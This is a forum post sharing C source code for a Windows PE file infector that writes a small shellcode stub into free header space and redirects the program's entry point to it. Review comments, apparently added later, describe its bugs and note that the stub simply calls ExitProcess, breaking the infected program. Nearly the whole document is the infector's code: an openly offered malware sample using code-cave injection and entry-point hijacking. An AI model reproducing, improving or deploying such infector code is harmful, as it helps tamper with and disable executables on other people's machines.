Autor Thema: Pe infector  (Gelesen 151 mal)
Syler
« am: September 20, 2008, 05:52:56 »

Code:
/* Simple Pe Infector By _antony (c) http://sav1or.name */
/* infecting method:
   find a free space in pe header;
   how it works?
   we find the PointerToRawData of the .text section because the system loader puts it first;
   then we use my simple formula:
   delta = PointerToRawData - sizeof(code), and scan this region of memory; if it is free, infect the file and
   change the OEP to delta.
   may be it will be more correct to use
   delta = PointerToRawData - (sizeof(code) + some more)

*/
/* image presentation
   ------------------
   |  PE HEADER     |
   |________________|
   |                |
   |                |
   |  OBJECT TABLE  |
   |________________|                
   |                |
   |                |
   | FREE SPACE     |          
   | our code       |
   |________________|
   |                |
   |.text section   |
   | next section   |
   | next section   |
   | .............. |
   |                |
   ------------------
*/
#include<windows.h>
#include<stdio.h>
/*
 * Return the PointerToRawData (raw file offset) of the section named ".text",
 * or 0 when it is not found.
 *
 * pSectionHeader   : first entry of the section table
 * NumberOfSections : entry count taken from the file header
 *
 * The function is declared without a return type (implicit int, pre-C99
 * style); the caller stores the result in a DWORD.
 *
 * NOTE(review): the loop body changes neither pSectionHeader nor
 * NumberOfSections, so only the first section header is ever compared. When
 * that entry is not ".text" the loop does not terminate; in practice the
 * function only returns for files whose first section is .text.
 *
 * NOTE(review): IMAGE_SECTION_HEADER.Name is an 8-byte field that need not
 * be NUL-terminated, so strcmpi() can read past it for 8-character names.
 */
GetTextSectionOffset(PIMAGE_SECTION_HEADER pSectionHeader , int NumberOfSections)
{
while(NumberOfSections > 0)
{
/* case-insensitive comparison of the section name */
if( !strcmpi((char*)pSectionHeader->Name , &quot;.text&quot;))
{
return pSectionHeader->PointerToRawData;
}
}
/* we did not find .text section */
return 0;
}
/* entry point */
/*
 * Entry point. Opens the file named by argv[1], maps it read/write, checks
 * that the bytes just before the .text section's raw data are all zero,
 * writes a small stub there (push 0; mov eax, &ExitProcess; call eax) and
 * points AddressOfEntryPoint at it.
 *
 * Returns 0 after printing usage or on success, -1 on any failure.
 *
 * Analyst notes (all visible in the code below):
 *  - The stub calls ExitProcess(0) and never transfers control to the
 *    original entry point, which is only printed and not saved anywhere:
 *    a patched file terminates immediately at start-up. The host program is
 *    broken, not chained.
 *  - A patched file shows AddressOfEntryPoint inside the header area (below
 *    the first section's PointerToRawData), holding the byte pattern
 *    6A 00 B8 ?? ?? ?? ?? FF D0.
 *  - No PE validation is done: no MZ/PE signature check, and e_lfanew,
 *    NumberOfSections and PointerToRawData are taken straight from the input
 *    and used as offsets into the mapping without any bound against FileSize.
 *  - Pointers are cast through DWORD, so the arithmetic is only meaningful
 *    in a 32-bit build.
 */
int main(int argc , char *argv[])
{
HANDLE hFile;
HANDLE hMap;
char *MappedFile = 0;
DWORD FileSize; /* file size */
DWORD delta;  /* file offset the stub is written to: SectionOffset - sizeof(code) */
DWORD SectionOffset; /* .text section offset*/
DWORD func_addr; /* address of ExitProcess as resolved in this process */
IMAGE_DOS_HEADER *pDosHeader;
IMAGE_NT_HEADERS *pNtHeader;
IMAGE_SECTION_HEADER *pSecHeader;
/* shell code
 * 9 opcode bytes plus the string terminator: sizeof(code) is 10, and that
 * full length (terminator included) is what the scan and memcpy below use. */
char code[] = &quot;\x6A\x00&quot;              /*push 0 */
         &quot;\xB8\x00\x00\x00\x00&quot;  /*mov eax , func_addr (address will be inserted automaticly)*/
         &quot;\xFF\xD0&quot;;             /*call eax */
if(argc < 2)
{
printf(&quot;parameters : ssv.exe [filename] \n&quot;);
printf(&quot;simple pe infector by _antony \n&quot;);
return 0;
}
printf(&quot;target: [%s] \n&quot; , argv[1]);
/* open file
 * share mode 0: exclusive access for the lifetime of hFile */
hFile = CreateFile(argv[1] ,
              GENERIC_WRITE | GENERIC_READ ,
  0 ,
  0 ,
  OPEN_EXISTING ,
  FILE_ATTRIBUTE_NORMAL ,
  0);
if(hFile == INVALID_HANDLE_VALUE)
{
printf(&quot;[Error]: Can't open File! Error code : %d&quot; , GetLastError());
return -1;
}
/* get file size
 * Only the low 32 bits are requested (high part pointer is 0) and the
 * INVALID_FILE_SIZE error return is not checked. */
FileSize = GetFileSize(hFile , 0 );
printf(&quot;[File Size ]: %d \n&quot;, FileSize);
/* mapping file */
hMap = CreateFileMapping(hFile ,
                    0 ,
PAGE_READWRITE ,
0 ,
FileSize ,
0);
/* NOTE(review): CreateFileMapping reports failure by returning NULL, not
 * INVALID_HANDLE_VALUE, so this comparison does not catch a failed mapping. */
if(hMap == INVALID_HANDLE_VALUE)
{
printf(&quot;[Error]: Can't map file! Error code: %d\n&quot; , GetLastError());
CloseHandle(hFile);
return -1;
}
MappedFile = (char*)MapViewOfFile(hMap , FILE_MAP_READ | FILE_MAP_WRITE , 0 , 0 , FileSize);
if(MappedFile == NULL)
{
printf(&quot;[Error]: Can't map file! Error code %d\n&quot;, GetLastError());
CloseHandle(hFile);
CloseHandle(hMap);
/* MappedFile is NULL on this path, so this call has nothing to unmap */
UnmapViewOfFile(MappedFile);
return -1;
}
/* Walk DOS header -> NT headers -> section table. e_lfanew comes from the
 * input file and is not bounded against FileSize before being used. */
pDosHeader = (IMAGE_DOS_HEADER*)MappedFile;
pNtHeader  = (IMAGE_NT_HEADERS*)((DWORD)MappedFile + pDosHeader->e_lfanew);
pSecHeader = IMAGE_FIRST_SECTION(pNtHeader);
    /* get .text section PointerToRawData*/
SectionOffset = GetTextSectionOffset(pSecHeader , pNtHeader->FileHeader.NumberOfSections);
if(SectionOffset == 0)
{
printf(&quot;[Error]: Can't find .text section!\n&quot;);
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(MappedFile);
return -1;
}
/* Unsigned subtraction: wraps around when SectionOffset < sizeof(code);
 * nothing checks for that before delta is used as an index below. */
delta = SectionOffset - sizeof(code);
int i;
BYTE check;
printf(&quot;scanning...\n&quot;);
/* scanning space  if there are only 00 then we infect file
 * Reads sizeof(code) bytes starting at file offset delta, printing each one;
 * any non-zero byte aborts the run. */
for(i=0 ; i<sizeof(code) ; i++)
{
      check = *((BYTE*)MappedFile + delta + i);
 printf(&quot;%X \t&quot;, check);
 if(check != 0)
 {
 printf(&quot;There is some data...\n&quot;);
 CloseHandle(hFile);
 CloseHandle(hMap);
 UnmapViewOfFile(MappedFile);
 return -1;
 }
}
 printf(&quot;Space if free , infecting File...\n&quot;);
 /* insert function address in shell code
  * The address is resolved in this process and baked into the stub as an
  * absolute immediate; whether it is valid in the patched program depends on
  * where kernel32 is loaded there, which is not checked. */
 func_addr = (DWORD)GetProcAddress( LoadLibrary(&quot;kernel32.dll&quot;) , &quot;ExitProcess&quot;);
 /* Find the "mov eax, imm32" opcode: a DWORD read equal to 0xB8 means the
  * byte 0xB8 followed by three zero bytes, which occurs at i == 2, and the
  * immediate is then written at code+3.
  * NOTE(review): the DWORD read at &code[i] runs for i up to 9, i.e. it reads
  * code[9..12] past the end of the 10-byte array, and it is an unaligned
  * type-punned access. */
 for(i=0 ; i < sizeof(code) ; i++ )
 {
 if( *(DWORD*)&code[i] == 0x00000B8)
 {
 *(DWORD*)(code+i+1)= func_addr;
 }
 }
 /* The old entry point is only printed; it is not stored in the stub. */
 printf(&quot;Old Entry Point : %08X \n&quot; , pNtHeader->OptionalHeader.AddressOfEntryPoint);
 /* copies all sizeof(code) bytes, terminator included, into the mapping */
 memcpy(MappedFile+delta , code , sizeof(code));
 /* new entry point
  * delta is a raw file offset written into an RVA field; the two only agree
  * while delta lies inside the header region that is mapped at RVA 0. */
 pNtHeader->OptionalHeader.AddressOfEntryPoint = delta;
          printf(&quot;File infected!\n&quot;);
 printf(&quot;New Entry Point: %08X \n&quot; , delta);
 /* Handles are closed before the view is unmapped; the mapping stays
  * alive until the view is released. */
 CloseHandle(hFile);
 CloseHandle(hMap);
 UnmapViewOfFile(MappedFile);
 return 0;
}



